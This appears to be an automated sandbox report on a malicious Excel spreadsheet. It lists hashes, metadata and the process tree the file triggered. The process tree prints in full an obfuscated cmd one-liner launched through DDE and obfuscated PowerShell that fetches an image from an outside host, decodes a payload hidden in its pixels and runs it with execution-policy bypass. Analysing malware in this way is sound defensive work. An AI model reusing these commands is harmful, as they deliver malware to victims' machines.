File name: | f39618fbdbb3788fa9444c84522a069b867e3237567ddd722f5e9a42838a4371.xls |
Full analysis: | https://app.any.run/tasks/f454a676-9c84-47df-873b-3ca846a61ec6 |
Verdict: | Malicious activity |
Analysis date: | November 14, 2018, 14:50:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Oct 30 09:35:12 2018, Last Saved Time/Date: Tue Oct 30 09:47:20 2018, Security: 0 |
MD5: | E5C72950358CB38B8A36223EE60B4635 |
SHA1: | CA26736F25E38FDD30F35797124AC09B4A55A119 |
SHA256: | F39618FBDBB3788FA9444C84522A069B867E3237567DDD722F5E9A42838A4371 |
SSDEEP: | 1536:6dEgS4vhBHVUCKYJhMRCunLjKbx1+II3OwZ1nxscjOhL:7gS4vhSYBeLOb59QXj |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
Author: | - |
---|---|
LastModifiedBy: | - |
Software: | Microsoft Excel |
CreateDate: | 2018:10:30 09:35:12 |
ModifyDate: | 2018:10:30 09:47:20 |
Security: | None |
CodePage: | Unicode (UTF-8) |
AppVersion: | 14 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
CompObjUserTypeLen: | 31 |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2004 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
4076 | cmd /V:ON/C"set d0=rMc5( ""Fj$hEJOYU2uwf=ip7CGdI-klmngTR,H34/^|B]Lbs'o%AXvy1[V_0{D;+:}*^&x\aPSW6^^9`etK).N&&for %x in (12,2,11,14,5,5,5,75,75,75,67,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,12,1,48,37,48,28,35,48,37,48,72,12,35,29,48,81,5,5,4,7,60,55,65,60,17,65,60,59,65,7,5,29,20,48,17,27,26,48,37,48,53,51,48,37,48,0,22,70,46,31,78,64,48,81,5,5,4,5,5,56,35,54,71,12,44,4,7,60,59,65,60,55,65,7,29,8,5,48,1,51,35,48,37,48,38,48,81,5,5,81,62,5,5,82,4,7,60,59,65,60,55,65,60,17,65,7,5,29,20,5,48,47,12,48,37,48,79,29,48,37,48,22,79,12,1,48,81,5,5,4,7,60,55,65,60,59,65,60,17,65,60,40,65,60,39,65,7,29,20,5,48,70,48,37,48,53,70,0,22,48,37,48,43,48,37,48,27,26,83,57,48,37,48,31,12,64,48,81,5,4,5,56,35,54,71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,59,65,60,55,65,60,17,65,7,29,20,48,83,78,19,29,14,46,9,78,48,37,48,2,48,37,48,79,48,81,62,82,4,7,60,55,65,60,59,65,7,5,29,20,5,48,29,35,54,23,78,48,37,48,51,27,27,48,81,5,29,51,47,47,78,32,46,31,54,83,70,32,78,5,4,7,60,59,65,60,17,65,60,39,65,60,55,65,60,40,65,7,5,29,20,48,72,54,48,37,48,0,70,19,22,48,37,48,47,48,37,48,79,78,32,82,61,48,37,48,33,34,48,81,62,10,60,34,65,21,75,75,75,67,4,48,70,48,81,5,4,7,60,40,65,60,55,65,60,39,65,60,17,65,60,59,65,7,29,20,5,48,23,48,37,48,79,78,32,82,61,0,70,48,37,48,34,82,43,22,79,32,70,48,37,48,19,22,33,48,37,48,72,54,47,48,81,4,4,82,4,48,70,48,81,5,4,7,60,17,65,60,59,65,60,55,65,7,29,20,5,48,31,22,78,33,48,37,48,79,48,37,48,83,78,79,82,73,78,46,25,48,81,81,82,4,7,60,55,65,60,59,65,7,5,29,20,48,78,33,36,78,70,27,48,37,48,14,23,48,81,82,28,33,53,49,30,78,4,4,7,60,59,65,60,17,65,60,39,65,60,74,65,60,3,65,60,55,65,60,40,65,7,5,29,20,5,48,11,79,48,37,48,78,82,22,46,46,82,2,49,41,9,0,61,13,53,59,41,11,23,82,23,33,48,37,48,79,23,47,64,41,48,37,48,41,22,32,48,37,48,34,48,37,48,34,48,37,48,70,48,81,81,81,62,10,60,49,65,21,82,4,48,70,48,81,5,4,7,60,59,65,60,55,65,7,5,29,20,48,43,54,48,37,48,79,78,56,44,48,81,5,40,76,74,59,62,4,59,82,82,24,81,75,75,75,42,75,75,75,67,4,48,50,48,81,60,20,49,0,78,70,2,11,4,10,60,68,65,5,22,33,4,59,82,82,74,55,76,81,81,60,10,60,71,65,21,10,60,26,65,82,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,78,31,48,37,48,22,68,48,37,48,26,78,79,71,48,81,82,28,33,53,49,30,78,4,10,60,52,65,37,10,60,58,65,81,62,10,60,14,65,56,10,60,58,65,66,74,17,59,63,10,60,52,65,44,21,4,5,4,82,4,7,60,17,65,60,59,65,60,55,65,7,29,20,48,0,28,51,43,48,37,48,31,78,48,37,48,57,51,48,81,5,5,4,7,60,55,65,60,59,65,7,29,20,48,27,26,48,37,48,17,48,81,5,29,57,70,45,16,78,49,83,31,15,5,81,64,64,4,7,60,55,65,60,59,65,7,29,20,48,31,49,49,0,48,37,48,8,48,81,82,28,33,53,49,30,78,4,4,10,60,23,65,82,7,43,7,29,46,70,33,27,55,3,81,66,55,74,81,29,46,49,0,4,10,60,71,65,82,7,26,7,5,29,46,70,33,27,5,55,3,81,81,65,65,62,82,4,7,60,55,65,60,59,65,7,5,29,20,5,48,52,48,37,48,28,12,48,81,4,5,4,75,75,75,67,4,7,60,59,65,60,55,65,60,17,65,60,39,65,7,29,20,5,48,26,48,37,48,78,79,29,53,51,48,37,48,0,28,48,37,48,51,43,31,12,48,81,5,4,7,60,59,65,60,55,65,7,29,20,48,61,26,48,37,48,83,53,48,81,5,29,53,51,31,18,78,49,5,5,81,64,64,7,70,72,25,77,22,28,7,82,7,34,78,79,72,77,35,0,77,28,83,34,7,4,10,60,49,65,56,59,82,82,40,24,39,17,44,81,81,42,25,45,22,23,5,67,67,2,32,27,5,41,25,5,23,49,19,78,36,47,38,78,45,45,5,5,29,83,49,31,14,26,5,29,78,52,12,25,16,35,5,43,54,71,70,72,72,5,29,72,35,5,5,29,33,49,71,36,49,8,5,29,19,22,5,11,22,5,5,29,83,14,83,22,83,79,78,5,5,5,5,5,75,75,75,67,5,5,4,69,7,60,17,65,60,59,65,60,55,65,69,7,5,29,20,5,48,29,35,48,37,48,54,23,78,48,37,48,51,27,27,48,5,81,5,29,51,47,47,78,32,5,4,5,5,69,7,60,39,65,60,40,65,60,59,65,60,55,65,60,17,65,69,7,29,20,5,48,49,48,37,48,33,25,49,48,37,48,0,78,48,37,48,71,48,37,4,5,69,7,60,59,65,60,55,65,60,17,65,69,7,29,20,48,0,78,48,37,48,47,78,33,79,70,48,37,48,79,22,48,5,5,81,81,5,5,62,5,5,5,5,5,82,4,5,5,69,7,60,39,65,60,17,65,60,55,65,60,59,65,69,7,29,20,5,4,5,5,69,7,60,59,65,60,55,65,69,7,5,29,20,5,48,72,28,48,37,48,14,33,48,81,37,4,5,5,69,7,60,55,65,60,59,65,69,7,5,29,20,48,78,47,48,37,48,68,71,0,48,5,81,37,48,78,48,37,4,5,69,7,60,59,65,60,55,65,69,7,5,29,20,48,28,48,37,48,83,53,14,30,78,29,48,81,5,5,81,5,4,5,5,4,5,56,19,22,83,61,49,19,72,82,25,45,22,23,43,49,51,0,61,44,64,64,4,69,7,60,55,65,60,59,65,69,7,5,29,20,48,52,79,48,37,4,69,7,60,55,65,60,59,65,69,7,29,20,48,35,78,48,37,48,26,78,35,48,81,5,81,82,69,7,28,33,77,57,49,80,12,69,7,4,5,5,81,5,81,5,81,5,5,5,62,56,73,22,33,27,49,19,47,82,25,31,22,23,46,49,70,0,27,44,64,64,4,5,5,69,7,60,55,65,60,59,65,69,7,5,29,20,5,48,0,48,37,4,69,7,60,55,65,60,59,65,69,7,29,20,48,31,78,70,48,37,48,25,48,5,5,81,5,81,82,69,7,22,77,83,57,49,80,78,69,7,4,5,5,81,90)do set hoR=!hoR!!d0:~%x,1!&&if %x==90 cmd /C!hoR:*hoR!=!" | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 4294770688 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3400 | cmd /CEchO ^^^&("{2}{1}{0}" -f 'EM','IT','SET-') ("{1}{2}{0}" -f'2dG','vA','riable:') ( [TyPE]("{0}{1}"-F 'MAT','H') ); .("{0}{1}{2}" -f 'sE','t-','itEM') ("{1}{0}{2}{4}{3}"-f 'a','vari','B','dGNV','lE:') ( [TyPE]("{4}{1}{0}{3}{2}" -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^^^&("{0}{1}" -f 's','al') ('a') ("{0}{1}{2}"-f'New-Obje','c','t');.("{1}{0}" -f '-Type','Add') -AssemblyName ("{0}{2}{3}{1}{4}" -f'Sy','rawi','s','tem.D','ng');${g}=^^^&('a') ("{4}{1}{3}{2}{0}"-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ("{2}{0}{1}"-f 'lien','t','Net.WebC')).("{1}{0}" -f'enRead','Op').Invoke(("{0}{2}{3}{6}{5}{1}{4}" -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ("{0}{1}" -f'By','te[]') 4960;(0..7)^^^|^^^&('%'){foreach(${x} in(0..619)){${P}=${G}.("{2}{1}{0}" -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.("{2}{0}{1}"-f'rIAB','le','VA') ("{1}{0}"-f'dG','2') -VaLUeoNlY )::("{1}{0}"-f'loor','F').Invoke((${p}."B"-band15)*16)-bor(${P}."G" -band 15))}};.("{1}{0}" -f 'X','IE')( (^^^&("{0}{1}{2}{3}"-f 'G','et-vA','rI','ABlE') ("{0}{1}"-f'DG','Nv') -vAlueo )::"aSC`iI"."getS`Tr`INg"(${o}[0..4732]))|CLip &&cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^^^& (\"{2}{0}{1}\" -f '-T','ype','Add' ) -Assem ( \"{3}{4}{0}{1}{2}\"-f 'o','nCo','re','P',( \"{0}{1}{2}\"-f're','senta','ti' )) ; .( \"{3}{2}{1}{0}\"-f ( \"{0}{1}\" -f 'SI','On'),( \"{1}{0}\" -f'es','xPr' ),'e',( \"{0}{1}\" -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\"{1}{0}\" -f'Xt',(\"{1}{0}\"-f'Te','GeT') ).\"In`VoKE\"( ) ) ) ;[Windows.Clipboard]::( \"{1}{0}\" -f 'r',(\"{1}{0}\"-f'lea','C' ) ).\"i`NVoKe\"( ) | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 4294770688 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
912 | C:\Windows\system32\cmd.exe /S /D /c" EchO ^&("{2}{1}{0}" -f 'EM','IT','SET-') ("{1}{2}{0}" -f'2dG','vA','riable:') ( [TyPE]("{0}{1}"-F 'MAT','H') ); .("{0}{1}{2}" -f 'sE','t-','itEM') ("{1}{0}{2}{4}{3}"-f 'a','vari','B','dGNV','lE:') ( [TyPE]("{4}{1}{0}{3}{2}" -F '.ENC','Em.TeXT','nG','Odi','sysT') ) ; ^&("{0}{1}" -f 's','al') ('a') ("{0}{1}{2}"-f'New-Obje','c','t');.("{1}{0}" -f '-Type','Add') -AssemblyName ("{0}{2}{3}{1}{4}" -f'Sy','rawi','s','tem.D','ng');${g}=^&('a') ("{4}{1}{3}{2}{0}"-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ("{2}{0}{1}"-f 'lien','t','Net.WebC')).("{1}{0}" -f'enRead','Op').Invoke(("{0}{2}{3}{6}{5}{1}{4}" -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ("{0}{1}" -f'By','te[]') 4960;(0..7)^|^&('%'){foreach(${x} in(0..619)){${P}=${G}.("{2}{1}{0}" -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.("{2}{0}{1}"-f'rIAB','le','VA') ("{1}{0}"-f'dG','2') -VaLUeoNlY )::("{1}{0}"-f'loor','F').Invoke((${p}."B"-band15)*16)-bor(${P}."G" -band 15))}};.("{1}{0}" -f 'X','IE')( (^&("{0}{1}{2}{3}"-f 'G','et-vA','rI','ABlE') ("{0}{1}"-f'DG','Nv') -vAlueo )::"aSC`iI"."getS`Tr`INg"(${o}[0..4732]))" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3956 | CLip | C:\Windows\system32\clip.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Clip - copies the data into clipboard Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2320 | cmd /C poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte ^& (\"{2}{0}{1}\" -f '-T','ype','Add' ) -Assem ( \"{3}{4}{0}{1}{2}\"-f 'o','nCo','re','P',( \"{0}{1}{2}\"-f're','senta','ti' )) ; .( \"{3}{2}{1}{0}\"-f ( \"{0}{1}\" -f 'SI','On'),( \"{1}{0}\" -f'es','xPr' ),'e',( \"{0}{1}\" -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\"{1}{0}\" -f'Xt',(\"{1}{0}\"-f'Te','GeT') ).\"In`VoKE\"( ) ) ) ;[Windows.Clipboard]::( \"{1}{0}\" -f 'r',(\"{1}{0}\"-f'lea','C' ) ).\"i`NVoKe\"( ) | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 4294770688 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2980 | poweRsHeLL -NolOG -eXECUT ByPaSS -ST -noPRoF -wi hi -NONiNte & (\"{2}{0}{1}\" -f '-T','ype','Add' ) -Assem ( \"{3}{4}{0}{1}{2}\"-f 'o','nCo','re','P',( \"{0}{1}{2}\"-f're','senta','ti' )) ; .( \"{3}{2}{1}{0}\"-f ( \"{0}{1}\" -f 'SI','On'),( \"{1}{0}\" -f'es','xPr' ),'e',( \"{0}{1}\" -f'I','NvOke-') ) ( ( [wiNDowS.CLipBoArD]::(\"{1}{0}\" -f'Xt',(\"{1}{0}\"-f'Te','GeT') ).\"In`VoKE\"( ) ) ) ;[Windows.Clipboard]::( \"{1}{0}\" -f 'r',(\"{1}{0}\"-f'lea','C' ) ).\"i`NVoKe\"( ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294770688 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2004 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA10E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MLMJLD183E8RIXCGM7LI.temp | — | |
MD5:— | SHA256:— | |||
2004 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48490406.emf | emf | |
MD5:050B6BD9847D381A0D0F275B83B41B5F | SHA256:8650B0FA7D292FC367ED676A3D69A9CC41377D7B9D1DAD700D9CF144680CAC1A | |||
2980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db263.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |